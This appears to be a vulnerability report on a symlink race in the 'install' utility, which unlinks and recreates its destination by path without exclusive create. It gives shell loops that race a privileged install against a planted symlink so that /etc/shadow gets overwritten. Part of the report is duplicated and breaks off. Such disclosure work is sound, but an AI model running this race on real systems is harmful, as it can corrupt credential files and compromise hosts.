Component
install
Description
The install utility unlinks the destination file, and then recreates it by pathname.
The code never uses exclusive create semantics (O_EXCL/create_new). After deciding what to install, it reopens the destination by name, trusting that the unlinked path hasn't been replaced.
Test / Reproduction Steps
# Terminal 1: privileged install loop
while true; do sudo install source.txt /tmp/attacker-writable/target; done
# Terminal 2: attacker racing to plant symlink
while true; do rm -f /tmp/attacker-writable/target; ln -s /etc/shadow /tmp/attacker-writable/target; done
# On success: /etc/shadow gets overwritten with source.txt contents
Component
installDescription
The install utility unlinks the destination file, and then recreates it by pathname.
The code never uses exclusive create semantics (O_EXCL/create_new). After deciding what to install, it reopens the destination by name, trusting that the unlinked path hasn't been replaced.
Test / Reproduction Steps